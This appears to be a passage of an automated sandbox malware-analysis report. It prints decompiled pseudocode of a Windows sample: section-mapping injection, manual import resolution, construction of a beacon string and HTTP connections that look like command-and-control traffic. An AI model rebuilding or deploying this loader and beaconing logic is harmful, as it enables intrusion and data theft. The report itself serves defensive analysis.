          					if(_a4 != 0 || GetLastError() == 0xb7) {
          						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
          						if(_t22 == 0) {
          							_t32 = GetLastError();
          							if(_t32 != 0) {
          								goto L9;
          							}
          						} else {
          							 *_a8 = _t34;
          							 *_a12 = _t22;
          							_t32 = 0;
          						}
          					} else {
          						_t32 = 2;
          						L9:
          						CloseHandle(_t34);
          					}
          				}
          				return _t32;
          			}

          APIs
          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
          • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
          • String ID:
          • API String ID: 3812556954-0
          • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
          • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
          • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
          • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 72%
          			E0040110B(intOrPtr* __eax, void** _a4) {
          				int _v12;
          				void* _v16;
          				void* _v20;
          				void* _v24;
          				int _v28;
          				int _v32;
          				intOrPtr _v36;
          				int _v40;
          				int _v44;
          				void* _v48;
          				void* __esi;
          				long _t34;
          				void* _t39;
          				void* _t47;
          				intOrPtr* _t48;
          
          				_t48 = __eax;
          				asm("stosd");
          				asm("stosd");
          				asm("stosd");
          				asm("stosd");
          				asm("stosd");
          				asm("stosd");
          				_v24 =  *((intOrPtr*)(__eax + 4));
          				_v16 = 0;
          				_v12 = 0;
          				_v48 = 0x18;
          				_v44 = 0;
          				_v36 = 0x40;
          				_v40 = 0;
          				_v32 = 0;
          				_v28 = 0;
          				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
          				if(_t34 < 0) {
          					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
          				} else {
          					 *_t48 = _v16;
          					_t39 = E00401459(_t48,  &_v12); // executed
          					_t47 = _t39;
          					if(_t47 != 0) {
          						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
          					} else {
          						memset(_v12, 0, _v24);
          						 *_a4 = _v12;
          					}
          				}
          				return _t47;
          			}

          APIs
          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401168
            • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
          • memset.NTDLL ref: 0040118A
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: Section$CreateViewmemset
          • String ID: @
          • API String ID: 2533685722-2766056989
          • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
          • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
          • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
          • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00401000(void* __edi, intOrPtr _a4) {
          				signed int _v8;
          				intOrPtr* _v12;
          				_Unknown_base(*)()** _v16;
          				signed int _v20;
          				signed short _v24;
          				struct HINSTANCE__* _v28;
          				intOrPtr _t43;
          				intOrPtr* _t45;
          				intOrPtr _t46;
          				struct HINSTANCE__* _t47;
          				intOrPtr* _t49;
          				intOrPtr _t50;
          				signed short _t51;
          				_Unknown_base(*)()* _t53;
          				CHAR* _t54;
          				_Unknown_base(*)()* _t55;
          				void* _t58;
          				signed int _t59;
          				_Unknown_base(*)()* _t60;
          				intOrPtr _t61;
          				intOrPtr _t65;
          				signed int _t68;
          				void* _t69;
          				CHAR* _t71;
          				signed short* _t73;
          
          				_t69 = __edi;
          				_v20 = _v20 & 0x00000000;
          				_t59 =  *0x404180;
          				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
          				if(_t43 != 0) {
          					_t45 = _t43 + __edi;
          					_v12 = _t45;
          					_t46 =  *((intOrPtr*)(_t45 + 0xc));
          					if(_t46 != 0) {
          						while(1) {
          							_t71 = _t46 + _t69;
          							_t47 = LoadLibraryA(_t71); // executed
          							_v28 = _t47;
          							if(_t47 == 0) {
          								break;
          							}
          							_v24 = _v24 & 0x00000000;
          							 *_t71 = _t59 - 0x43175ac3;
          							_t49 = _v12;
          							_t61 =  *((intOrPtr*)(_t49 + 0x10));
          							_t50 =  *_t49;
          							if(_t50 != 0) {
          								L6:
          								_t73 = _t50 + _t69;
          								_v16 = _t61 + _t69;
          								while(1) {
          									_t51 =  *_t73;
          									if(_t51 == 0) {
          										break;
          									}
          									if(__eflags < 0) {
          										__eflags = _t51 - _t69;
          										if(_t51 < _t69) {
          											L12:
          											_t21 =  &_v8;
          											 *_t21 = _v8 & 0x00000000;
          											__eflags =  *_t21;
          											_v24 =  *_t73 & 0x0000ffff;
          										} else {
          											_t65 = _a4;
          											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
          											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
          												goto L12;
          											} else {
          												goto L11;
          											}
          										}
          									} else {
          										_t51 = _t51 + _t69;
          										L11:
          										_v8 = _t51;
          									}
          									_t53 = _v8;
          									__eflags = _t53;
          									if(_t53 == 0) {
          										_t54 = _v24 & 0x0000ffff;
          									} else {
          										_t54 = _t53 + 2;
          									}
          									_t55 = GetProcAddress(_v28, _t54);
          									__eflags = _t55;
          									if(__eflags == 0) {
          										_v20 = _t59 - 0x43175a44;
          									} else {
          										_t68 = _v8;
          										__eflags = _t68;
          										if(_t68 != 0) {
          											 *_t68 = _t59 - 0x43175ac3;
          										}
          										 *_v16 = _t55;
          										_t58 = _t59 * 4 - 0xc5d6b08;
          										_t73 = _t73 + _t58;
          										_t32 =  &_v16;
          										 *_t32 = _v16 + _t58;
          										__eflags =  *_t32;
          										continue;
          									}
          									goto L23;
          								}
          							} else {
          								_t50 = _t61;
          								if(_t61 != 0) {
          									goto L6;
          								}
          							}
          							L23:
          							_v12 = _v12 + 0x14;
          							_t46 =  *((intOrPtr*)(_v12 + 0xc));
          							if(_t46 != 0) {
          								continue;
          							} else {
          							}
          							L26:
          							goto L27;
          						}
          						_t60 = _t59 + 0xbce8a5bb;
          						__eflags = _t60;
          						_v20 = _t60;
          						goto L26;
          					}
          				}
          				L27:
          				return _v20;
          			}

          APIs
          • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
          • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID:
          • API String ID: 2574300362-0
          • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
          • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
          • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
          • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 68%
          			E00401459(void** __esi, PVOID* _a4) {
          				long _v8;
          				void* _v12;
          				void* _v16;
          				long _t13;
          
          				_v16 = 0;
          				asm("stosd");
          				_v8 = 0;
          				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
          				if(_t13 < 0) {
          					_push(_t13);
          					return __esi[6]();
          				}
          				return 0;
          			}

          APIs
          • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: SectionView
          • String ID:
          • API String ID: 1323581903-0
          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
          • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
          • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          C-Code - Quality: 69%
          			E005E3CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
          				intOrPtr _v4;
          				intOrPtr _v8;
          				intOrPtr _v16;
          				intOrPtr _v20;
          				intOrPtr _v24;
          				intOrPtr _v28;
          				intOrPtr _v32;
          				void* _v48;
          				intOrPtr _v56;
          				void* __edi;
          				intOrPtr _t30;
          				void* _t31;
          				intOrPtr _t33;
          				intOrPtr _t34;
          				intOrPtr _t35;
          				intOrPtr _t36;
          				intOrPtr _t37;
          				void* _t40;
          				intOrPtr _t41;
          				int _t44;
          				intOrPtr _t45;
          				int _t48;
          				void* _t49;
          				intOrPtr _t53;
          				intOrPtr _t59;
          				intOrPtr _t63;
          				intOrPtr* _t65;
          				void* _t66;
          				intOrPtr _t71;
          				intOrPtr _t77;
          				intOrPtr _t80;
          				intOrPtr _t83;
          				int _t86;
          				intOrPtr _t88;
          				int _t91;
          				intOrPtr _t93;
          				int _t96;
          				void* _t98;
          				void* _t99;
          				void* _t103;
          				void* _t105;
          				void* _t106;
          				intOrPtr _t107;
          				long _t109;
          				intOrPtr* _t110;
          				intOrPtr* _t111;
          				long _t112;
          				int _t113;
          				void* _t114;
          				void* _t115;
          				void* _t116;
          				void* _t119;
          				void* _t120;
          				void* _t122;
          				void* _t123;
          
          				_t103 = __edx;
          				_t99 = __ecx;
          				_t120 =  &_v16;
          				_t112 = __eax;
          				_t30 =  *0x5ea3e0; // 0x2bc9c20
          				_v4 = _t30;
          				_v8 = 8;
          				_t31 = RtlAllocateHeap( *0x5ea2d8, 0, 0x800); // executed
          				_t98 = _t31;
          				if(_t98 != 0) {
          					if(_t112 == 0) {
          						_t112 = GetTickCount();
          					}
          					_t33 =  *0x5ea018; // 0xc5e3c68d
          					asm("bswap eax");
          					_t34 =  *0x5ea014; // 0x3a87c8cd
          					asm("bswap eax");
          					_t35 =  *0x5ea010; // 0xd8d2f808
          					asm("bswap eax");
          					_t36 =  *0x5ea00c; // 0x81762942
          					asm("bswap eax");
          					_t37 =  *0x5ea348; // 0x25dd5a8
          					_t3 = _t37 + 0x5eb5ac; // 0x74666f73
          					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x5ea02c,  *0x5ea004, _t112);
          					_t40 = E005E467F();
          					_t41 =  *0x5ea348; // 0x25dd5a8
          					_t4 = _t41 + 0x5eb575; // 0x74707526
          					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
          					_t122 = _t120 + 0x38;
          					_t114 = _t113 + _t44;
          					if(_a12 != 0) {
          						_t93 =  *0x5ea348; // 0x25dd5a8
          						_t8 = _t93 + 0x5eb508; // 0x732526
          						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
          						_t122 = _t122 + 0xc;
          						_t114 = _t114 + _t96;
          					}
          					_t45 =  *0x5ea348; // 0x25dd5a8
          					_t10 = _t45 + 0x5eb246; // 0x74636126
          					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
          					_t123 = _t122 + 0xc;
          					_t115 = _t114 + _t48; // executed
          					_t49 = E005E472F(_t99); // executed
          					_t105 = _t49;
          					if(_t105 != 0) {
          						_t88 =  *0x5ea348; // 0x25dd5a8
          						_t12 = _t88 + 0x5eb8d0; // 0x736e6426
          						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
          						_t123 = _t123 + 0xc;
          						_t115 = _t115 + _t91;
          						HeapFree( *0x5ea2d8, 0, _t105);
          					}
          					_t106 = E005E1340();
          					if(_t106 != 0) {
          						_t83 =  *0x5ea348; // 0x25dd5a8
          						_t14 = _t83 + 0x5eb8c5; // 0x6f687726
          						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
          						_t123 = _t123 + 0xc;
          						_t115 = _t115 + _t86;
          						HeapFree( *0x5ea2d8, 0, _t106);
          					}
          					_t107 =  *0x5ea3cc; // 0x2bc9600
          					_a20 = E005E6B59(0x5ea00a, _t107 + 4);
          					_t53 =  *0x5ea36c; // 0x2bc95b0
          					_t109 = 0;
          					if(_t53 != 0) {
          						_t80 =  *0x5ea348; // 0x25dd5a8
          						_t17 = _t80 + 0x5eb8be; // 0x3d736f26
          						wsprintfA(_t115 + _t98, _t17, _t53);
          					}
          					if(_a20 != _t109) {
          						_t116 = RtlAllocateHeap( *0x5ea2d8, _t109, 0x800);
          						if(_t116 != _t109) {
          							E005E2915(GetTickCount());
          							_t59 =  *0x5ea3cc; // 0x2bc9600
          							__imp__(_t59 + 0x40);
          							asm("lock xadd [eax], ecx");
          							_t63 =  *0x5ea3cc; // 0x2bc9600
          							__imp__(_t63 + 0x40);
          							_t65 =  *0x5ea3cc; // 0x2bc9600
          							_t66 = E005E6675(1, _t103, _t98,  *_t65); // executed
          							_t119 = _t66;
          							asm("lock xadd [eax], ecx");
          							if(_t119 != _t109) {
          								StrTrimA(_t119, 0x5e9280);
          								_push(_t119);
          								_t71 = E005E7563();
          								_v20 = _t71;
          								if(_t71 != _t109) {
          									_t110 = __imp__;
          									 *_t110(_t119, _v8);
          									 *_t110(_t116, _v8);
          									_t111 = __imp__;
          									 *_t111(_t116, _v32);
          									 *_t111(_t116, _t119);
          									_t77 = E005E21A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
          									_v56 = _t77;
          									if(_t77 != 0 && _t77 != 0x10d2) {
          										E005E63F6();
          									}
          									HeapFree( *0x5ea2d8, 0, _v48);
          									_t109 = 0;
          								}
          								HeapFree( *0x5ea2d8, _t109, _t119);
          							}
          							RtlFreeHeap( *0x5ea2d8, _t109, _t116); // executed
          						}
          						HeapFree( *0x5ea2d8, _t109, _a12);
          					}
          					RtlFreeHeap( *0x5ea2d8, _t109, _t98); // executed
          				}
          				return _v16;
          			}

          APIs
          • RtlAllocateHeap.NTDLL ref: 005E3D08
          • GetTickCount.KERNEL32 ref: 005E3D1C
          • wsprintfA.USER32 ref: 005E3D6B
          • wsprintfA.USER32 ref: 005E3D88
          • wsprintfA.USER32 ref: 005E3DA9
          • wsprintfA.USER32 ref: 005E3DC1
          • wsprintfA.USER32 ref: 005E3DE4
          • HeapFree.KERNEL32(00000000,00000000), ref: 005E3DF4
          • wsprintfA.USER32 ref: 005E3E16
          • HeapFree.KERNEL32(00000000,00000000), ref: 005E3E26
          • wsprintfA.USER32 ref: 005E3E5E
          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005E3E79
          • GetTickCount.KERNEL32 ref: 005E3E89
          • RtlEnterCriticalSection.NTDLL(02BC95C0), ref: 005E3E9D
          • RtlLeaveCriticalSection.NTDLL(02BC95C0), ref: 005E3EBB
            • Part of subcall function 005E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66A0
            • Part of subcall function 005E6675: lstrlen.KERNEL32(00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66A8
            • Part of subcall function 005E6675: strcpy.NTDLL ref: 005E66BF
            • Part of subcall function 005E6675: lstrcat.KERNEL32(00000000,00000000), ref: 005E66CA
            • Part of subcall function 005E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,005E3ECE,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66E7
          • StrTrimA.SHLWAPI(00000000,005E9280,00000000,02BC9600), ref: 005E3EED
            • Part of subcall function 005E7563: lstrlen.KERNEL32(02BC9C10,00000000,00000000,00000000,005E3EF9,00000000), ref: 005E7573
            • Part of subcall function 005E7563: lstrlen.KERNEL32(?), ref: 005E757B
            • Part of subcall function 005E7563: lstrcpy.KERNEL32(00000000,02BC9C10), ref: 005E758F
            • Part of subcall function 005E7563: lstrcat.KERNEL32(00000000,?), ref: 005E759A
          • lstrcpy.KERNEL32(00000000,?), ref: 005E3F0C
          • lstrcpy.KERNEL32(00000000,?), ref: 005E3F13
          • lstrcat.KERNEL32(00000000,?), ref: 005E3F20
          • lstrcat.KERNEL32(00000000,00000000), ref: 005E3F24
            • Part of subcall function 005E21A6: WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E2258
          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 005E3F54
          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 005E3F64
          • RtlFreeHeap.NTDLL(00000000,00000000,00000000,02BC9600), ref: 005E3F72
          • HeapFree.KERNEL32(00000000,?), ref: 005E3F83
          • RtlFreeHeap.NTDLL(00000000,00000000), ref: 005E3F91
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
          • String ID: Uqt
          • API String ID: 186568778-2320327147
          • Opcode ID: eebf7b3feb615997b9bf7bb3ede2af964e28d61fc75f4ad62a57b6ce024ed834
          • Instruction ID: c6793bdd622b759b5052298eac6145466f63a21dd4c8749bc716e1a64e4fe3bf
          • Opcode Fuzzy Hash: eebf7b3feb615997b9bf7bb3ede2af964e28d61fc75f4ad62a57b6ce024ed834
          • Instruction Fuzzy Hash: 447190714002C5AFC719AB76DCCDE9B3BE8FB98700B050914F5C9DB231D631A909EB66
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          C-Code - Quality: 92%
          			E005E7B83(void* __eax, void* __ecx, long __esi, char* _a4) {
          				void _v8;
          				long _v12;
          				void _v16;
          				void* _t34;
          				void* _t38;
          				void* _t40;
          				char* _t56;
          				long _t57;
          				void* _t58;
          				intOrPtr _t59;
          				long _t65;
          
          				_t65 = __esi;
          				_t58 = __ecx;
          				_v16 = 0xea60;
          				__imp__( *(__esi + 4));
          				_v12 = __eax + __eax;
          				_t56 = E005E33DC(__eax + __eax + 1);
          				if(_t56 != 0) {
          					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
          						E005E61DA(_t56);
          					} else {
          						E005E61DA( *(__esi + 4));
          						 *(__esi + 4) = _t56;
          					}
          				}
          				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
          				 *(_t65 + 0x10) = _t34;
          				if(_t34 == 0 || InternetSetStatusCallback(_t34, E005E7B18) == 0xffffffff) {
          					L15:
          					return GetLastError();
          				} else {
          					ResetEvent( *(_t65 + 0x1c));
          					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
          					 *(_t65 + 0x14) = _t38;
          					if(_t38 != 0 || GetLastError() == 0x3e5 && E005E16B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
          						_t59 =  *0x5ea348; // 0x25dd5a8
          						_t15 = _t59 + 0x5eb845; // 0x544547
          						_v8 = 0x84404000;
          						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
          						 *(_t65 + 0x18) = _t40;
          						if(_t40 == 0) {
          							goto L15;
          						}
          						_t57 = 4;
          						_v12 = _t57;
          						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
          							_v8 = _v8 | 0x00000100;
          							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
          						}
          						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
          							goto L15;
          						} else {
          							return 0;
          						}
          					} else {
          						goto L15;
          					}
          				}
          			}

          0x005e7b83
          0x005e7b83
          0x005e7b8e
          0x005e7b95
          0x005e7b9d
          0x005e7ba7
          0x005e7bad
          0x005e7bc0
          0x005e7bd0
          0x005e7bc2
          0x005e7bc5
          0x005e7bca
          0x005e7bca
          0x005e7bc0
          0x005e7be0
          0x005e7be6
          0x005e7beb
          0x005e7cd4
          0x00000000
          0x005e7c06
          0x005e7c09
          0x005e7c1c
          0x005e7c22
          0x005e7c27
          0x005e7c4f
          0x005e7c62
          0x005e7c6c
          0x005e7c6f
          0x005e7c75
          0x005e7c7a
          0x00000000
          0x00000000
          0x005e7c7e
          0x005e7c8a
          0x005e7c9b
          0x005e7c9d
          0x005e7cae
          0x005e7cae
          0x005e7cbe
          0x00000000
          0x005e7cd0
          0x00000000
          0x005e7cd0
          0x00000000
          0x00000000
          0x00000000
          0x005e7c27

          APIs
          • lstrlen.KERNEL32(?,00000008,74714D40), ref: 005E7B95
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 005E7BB8
          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 005E7BE0
          • InternetSetStatusCallback.WININET(00000000,005E7B18), ref: 005E7BF7
          • ResetEvent.KERNEL32(?), ref: 005E7C09
          • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 005E7C1C
          • GetLastError.KERNEL32 ref: 005E7C29
          • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 005E7C6F
          • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 005E7C8D
          • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 005E7CAE
          • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 005E7CBA
          • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 005E7CCA
          • GetLastError.KERNEL32 ref: 005E7CD4
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
          • String ID: @MqtNqt
          • API String ID: 2290446683-2883916605
          • Opcode ID: dbd7201cc55d05684f07a4171be76362c491af0e9e6383b5164a981d90e8f82f
          • Instruction ID: c8635dc6388ff48917a460810c5921fbdb7079fc3f4f0b096507e17b9798d3f2
          • Opcode Fuzzy Hash: dbd7201cc55d05684f07a4171be76362c491af0e9e6383b5164a981d90e8f82f
          • Instruction Fuzzy Hash: DB419DB1500688BBD7399F72DC8DE5B7FBDFB98700F200918F686951A0E730AA05DB21
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 147 5e6815-5e6847 memset CreateWaitableTimerA 148 5e684d-5e68a6 _allmul SetWaitableTimer WaitForMultipleObjects 147->148 149 5e69c8-5e69ce 147->149 150 5e68ac-5e68af 148->150 151 5e6930-5e6936 148->151 157 5e69d2-5e69dc 149->157 153 5e68ba 150->153 154 5e68b1 call 5e5251 150->154 155 5e6937-5e693b 151->155 156 5e68c4 153->156 163 5e68b6-5e68b8 154->163 159 5e693d-5e693f 155->159 160 5e694b-5e694f 155->160 162 5e68c8-5e68cd 156->162 159->160 160->155 161 5e6951-5e695b CloseHandle 160->161 161->157 164 5e68cf-5e68d6 162->164 165 5e68e0-5e690d call 5e35d2 162->165 163->153 163->156 164->165 166 5e68d8 164->166 169 5e690f-5e691a 165->169 170 5e695d-5e6962 165->170 166->165 169->162 173 5e691c-5e692c call 5e69e6 169->173 171 5e6964-5e696a 170->171 172 5e6981-5e6989 170->172 171->151 174 5e696c-5e697f call 5e63f6 171->174 175 5e698f-5e69bd _allmul SetWaitableTimer WaitForMultipleObjects 172->175 173->151 174->175 175->162 178 5e69c3 175->178 178->151
          C-Code - Quality: 83%
          			E005E6815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
          				void _v48;
          				long _v52;
          				struct %anon52 _v60;
          				char _v72;
          				long _v76;
          				void* _v80;
          				union _LARGE_INTEGER _v84;
          				struct %anon52 _v92;
          				void* _v96;
          				void* _v100;
          				union _LARGE_INTEGER _v104;
          				long _v108;
          				struct %anon52 _v124;
          				long _v128;
          				struct %anon52 _t46;
          				void* _t51;
          				long _t53;
          				void* _t54;
          				struct %anon52 _t61;
          				long _t65;
          				struct %anon52 _t66;
          				void* _t69;
          				void* _t73;
          				signed int _t74;
          				void* _t76;
          				void* _t78;
          				void** _t82;
          				signed int _t86;
          				void* _t89;
          
          				_t76 = __edx;
          				_v52 = 0;
          				memset( &_v48, 0, 0x2c);
          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
          				_t46 = CreateWaitableTimerA(0, 1, 0);
          				_v60 = _t46;
          				if(_t46 == 0) {
          					_v92.HighPart = GetLastError();
          				} else {
          					_push(0xffffffff);
          					_push(0xff676980);
          					_push(0);
          					_push( *0x5ea2e0);
          					_v76 = 0;
          					_v80 = 0;
          					L005E82DA();
          					_v84.LowPart = _t46;
          					_v80 = _t76;
          					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
          					_t51 =  *0x5ea30c; // 0x1b4
          					_v76 = _t51;
